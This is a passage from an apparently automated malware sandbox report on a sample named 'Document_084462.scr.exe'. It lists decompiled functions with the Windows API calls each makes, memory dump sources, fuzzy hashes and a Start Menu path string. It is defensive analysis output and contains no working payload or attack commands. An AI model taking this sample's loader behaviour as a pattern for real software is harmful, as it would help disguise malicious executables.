                                                                              • Associated: 00000000.00000002.12979766907.00000000700B4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12979792470.00000000700B6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_700b0000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: ProtectVirtual
                                                                              • String ID:
                                                                              • API String ID: 544645111-0
                                                                              • Opcode ID: 82796c116b10ff35c46c6cc2595023985ff9cce1ee3deabf2083be8e19b33947
                                                                              • Instruction ID: 9b53ec08200a4bf57f18391953e89e30156b349d8f3acba766279855244cad68
                                                                              • Opcode Fuzzy Hash: 82796c116b10ff35c46c6cc2595023985ff9cce1ee3deabf2083be8e19b33947
                                                                              • Instruction Fuzzy Hash: F1F09EB2524280DEE351EF2A9C847893BF0B728736B2047AAD248D5260E3744844CF91
                                                                              Function 0040625B Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,?,?,007A0F28,?,?,004062E9,007A0F28,00000000,?,?,Call,?), ref: 0040627F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: Open
                                                                              • String ID:
                                                                              • API String ID: 71445658-0
                                                                              • Opcode ID: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                                              • Instruction ID: 981b209bfbc59ad728c3152e24748ded8346fc425447e23afb42b8d85bc6dac1
                                                                              • Opcode Fuzzy Hash: dcd566976f3bef00ddda20b11fb2537fa700d8cbfb920dfffbe2909342267143
                                                                              • Instruction Fuzzy Hash: 35D0123200020DBBDF11AF90ED05FAB372DAB08350F014426FE06A4091D775D530A728
                                                                              Function 00404390 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004043A2
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: 749224e8f98fb78827d13f0d237c1790e640dc60b1af624d5aad8e7e956e5cea
                                                                              • Instruction ID: 2ab46fc48b107f7ec410a0490fc1e10939948660fe742cc14426a6f165494095
                                                                              • Opcode Fuzzy Hash: 749224e8f98fb78827d13f0d237c1790e640dc60b1af624d5aad8e7e956e5cea
                                                                              • Instruction Fuzzy Hash: 26C04C75784700BADA149B549E45F0677546B90701F158429B641A50D0CA78D410DA2C
                                                                              Function 0040345A Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetFilePointer.KERNELBASE(?,00000000,00000000,004031DA,?,?,00000007,00000009,0000000B), ref: 00403468
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: FilePointer
                                                                              • String ID:
                                                                              • API String ID: 973152223-0
                                                                              • Opcode ID: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                              • Instruction ID: 036c8468b6dd2e012b37e6e875261c5f60c7cf4634656b07e897873a541603b6
                                                                              • Opcode Fuzzy Hash: e1e4f0b9cbde4cef3e4374ef9de0ac4f9a9ec0cef6a377cf2568efe91b529ef4
                                                                              • Instruction Fuzzy Hash: 1FB01231140304BFDA214F10DF09F067B21BB94700F20C034B384380F086711435EB0D
                                                                              Function 00404379 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(00000028,?,?,004041A4), ref: 00404387
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend
                                                                              • String ID:
                                                                              • API String ID: 3850602802-0
                                                                              • Opcode ID: 33429e90f145919918c0f5a16300b6ae2cb664e9c61a266d81822a9c1fb78e21
                                                                              • Instruction ID: 9ccc480ae856a8f761d654a46a9a0801f91457f8e33b58f107ae6609e89c6df3
                                                                              • Opcode Fuzzy Hash: 33429e90f145919918c0f5a16300b6ae2cb664e9c61a266d81822a9c1fb78e21
                                                                              • Instruction Fuzzy Hash: 51B09235181A00AADE914B00DE09F457A62A7A4701F00C029B241240B4CAB200A4DB0A
                                                                              Function 00404366 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • KiUserCallbackDispatcher.NTDLL(?,0040413D), ref: 00404370
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: CallbackDispatcherUser
                                                                              • String ID:
                                                                              • API String ID: 2492992576-0
                                                                              • Opcode ID: fb2bbd85db119072699d8509dbb0c67ddc0fed6d182cd9e62e167e16add427de
                                                                              • Instruction ID: f32ebe17383345fd09930a0b12515434b8b37a693fa3d318b2a69664ac7713bd
                                                                              • Opcode Fuzzy Hash: fb2bbd85db119072699d8509dbb0c67ddc0fed6d182cd9e62e167e16add427de
                                                                              • Instruction Fuzzy Hash: 97A00176405540AFEE029B61EF09D4ABB72ABA9701B4185B9A286A0034CB364860EB1D
                                                                              Function 004014D7 Relevance: 1.3, APIs: 1, Instructions: 19sleepCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: Sleep
                                                                              • String ID:
                                                                              • API String ID: 3472027048-0
                                                                              • Opcode ID: 105fb3db34f0ab7e38f6648118bc74ea061e25b53dce703b88c99de24f5127b8
                                                                              • Instruction ID: a18cf0c9a9b021ee27972f2e0a35f90bb7c2f66644072f7244457554decb08b2
                                                                              • Opcode Fuzzy Hash: 105fb3db34f0ab7e38f6648118bc74ea061e25b53dce703b88c99de24f5127b8
                                                                              • Instruction Fuzzy Hash: 0AD05EB3A201008BC700DFB8BE8545E73B8EA903193308837D452E2091E6B889518629
                                                                              Function 700B121B Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GlobalAlloc.KERNELBASE(00000040,?,700B123B,?,700B12DF,00000019,700B11BE,-000000A0), ref: 700B1225
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12979741278.00000000700B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 700B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.12979713482.00000000700B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12979766907.00000000700B4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12979792470.00000000700B6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_700b0000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: AllocGlobal
                                                                              • String ID:
                                                                              • API String ID: 3761449716-0
                                                                              • Opcode ID: e5cf7d5a2fef1288b440f3121cdfdcd9fc06d6b84f36fdb63cfd7daa0cc5063c
                                                                              • Instruction ID: cbda4dc8b091ed10432bda590e4d9040b933585257ee8645be647cd782a93245
                                                                              • Opcode Fuzzy Hash: e5cf7d5a2fef1288b440f3121cdfdcd9fc06d6b84f36fdb63cfd7daa0cc5063c
                                                                              • Instruction Fuzzy Hash: 7AB01272A10000DFFE00AB65CC0AF743254E700312F144140F700C0190C1B04C108534

                                                                              Non-executed Functions

                                                                              Function 00404835 Relevance: 23.0, APIs: 10, Strings: 3, Instructions: 275stringCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetDlgItem.USER32(?,000003FB), ref: 00404884
                                                                              • SetWindowTextW.USER32(00000000,?), ref: 004048AE
                                                                              • SHBrowseForFolderW.SHELL32(?), ref: 0040495F
                                                                              • CoTaskMemFree.OLE32(00000000), ref: 0040496A
                                                                              • lstrcmpiW.KERNEL32(Call,007A1F48,00000000,?,?), ref: 0040499C
                                                                              • lstrcatW.KERNEL32(?,Call), ref: 004049A8
                                                                              • SetDlgItemTextW.USER32(?,000003FB,?), ref: 004049BA
                                                                                • Part of subcall function 00405A38: GetDlgItemTextW.USER32(?,?,00000400,004049F1), ref: 00405A4B
                                                                                • Part of subcall function 0040669D: CharNextW.USER32(?,*?|<>/":,00000000,00000000,77043420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Document_084462.scr.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406700
                                                                                • Part of subcall function 0040669D: CharNextW.USER32(?,?,?,00000000,?,00000007,00000009,0000000B), ref: 0040670F
                                                                                • Part of subcall function 0040669D: CharNextW.USER32(?,00000000,77043420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Document_084462.scr.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406714
                                                                                • Part of subcall function 0040669D: CharPrevW.USER32(?,?,77043420,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\Document_084462.scr.exe",0040347D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,004036EC,?,00000007,00000009,0000000B), ref: 00406727
                                                                              • GetDiskFreeSpaceW.KERNEL32(0079FF18,?,?,0000040F,?,0079FF18,0079FF18,?,?,0079FF18,?,?,000003FB,?), ref: 00404A7D
                                                                              • MulDiv.KERNEL32(?,0000040F,00000400), ref: 00404A98
                                                                                • Part of subcall function 00404BF1: lstrlenW.KERNEL32(007A1F48,007A1F48,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404C92
                                                                                • Part of subcall function 00404BF1: wsprintfW.USER32 ref: 00404C9B
                                                                                • Part of subcall function 00404BF1: SetDlgItemTextW.USER32(?,007A1F48), ref: 00404CAE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007C6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12949192641.00000000007C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_400000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                              • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires$Call
                                                                              • API String ID: 2624150263-3018202500
                                                                              • Opcode ID: d6791cdbf7c3281003b221a05808b40c9ad422951b6e996bdb0757aefb9ec102
                                                                              • Instruction ID: 411b0bed4dd1c8854bcfe70218cd405116d93f5cc49f5f9e093397eef6854a11
                                                                              • Opcode Fuzzy Hash: d6791cdbf7c3281003b221a05808b40c9ad422951b6e996bdb0757aefb9ec102
                                                                              • Instruction Fuzzy Hash: 78A17FB1A00209ABDB11EFA5CD81AAF77B8EF84314F10843BF601B62D1D77C99418F69
                                                                              Function 700B1B5F Relevance: 20.1, APIs: 13, Instructions: 597stringlibrarymemoryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 700B121B: GlobalAlloc.KERNELBASE(00000040,?,700B123B,?,700B12DF,00000019,700B11BE,-000000A0), ref: 700B1225
                                                                              • GlobalAlloc.KERNEL32(00000040,00001CA4), ref: 700B1C8D
                                                                              • lstrcpyW.KERNEL32(00000008,?), ref: 700B1CD5
                                                                              • lstrcpyW.KERNEL32(00000808,?), ref: 700B1CDF
                                                                              • GlobalFree.KERNEL32(00000000), ref: 700B1CF2
                                                                              • GlobalFree.KERNEL32(?), ref: 700B1DD4
                                                                              • GlobalFree.KERNEL32(?), ref: 700B1DD9
                                                                              • GlobalFree.KERNEL32(?), ref: 700B1DDE
                                                                              • GlobalFree.KERNEL32(00000000), ref: 700B1FC8
                                                                              • lstrcpyW.KERNEL32(?,?), ref: 700B2182
                                                                              • GetModuleHandleW.KERNEL32(00000008), ref: 700B2201
                                                                              • LoadLibraryW.KERNEL32(00000008), ref: 700B2212
                                                                              • GetProcAddress.KERNEL32(?,?), ref: 700B226C
                                                                              • lstrlenW.KERNEL32(00000808), ref: 700B2286
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12979741278.00000000700B1000.00000020.00000001.01000000.00000004.sdmp, Offset: 700B0000, based on PE: true
                                                                              • Associated: 00000000.00000002.12979713482.00000000700B0000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12979766907.00000000700B4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12979792470.00000000700B6000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_700b0000_Document_084462.jbxd
                                                                              Similarity
                                                                              • API ID: Global$Free$lstrcpy$Alloc$AddressHandleLibraryLoadModuleProclstrlen
                                                                              • String ID:
                                                                              • API String ID: 245916457-0
                                                                              • Opcode ID: 0eafcd615b9dedc06b368ef4c64b64af8a2ee21d99264b2e232c9d940f2b6111
                                                                              • Instruction ID: be579387dbbc07a9901c7b5bbb20d5b25aab02bc7bbc575e466ca2a74ab9d914
                                                                              • Opcode Fuzzy Hash: 0eafcd615b9dedc06b368ef4c64b64af8a2ee21d99264b2e232c9d940f2b6111
                                                                              • Instruction Fuzzy Hash: D6229D71D1424ADECB219FA4CD806EEB7F7FB04B25FA0452ED166E6380D7789A80DB50
                                                                              Function 004021A2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 129comCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • CoCreateInstance.OLE32(004084E4,?,?,004084D4,?,?,00000045,000000CD,00000002,000000DF,000000F0), ref: 00402221
                                                                              Strings
                                                                              • C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires, xrefs: 00402261
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.12948470201.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000000.00000002.12948451793.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948490828.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007AE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.12948523864.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
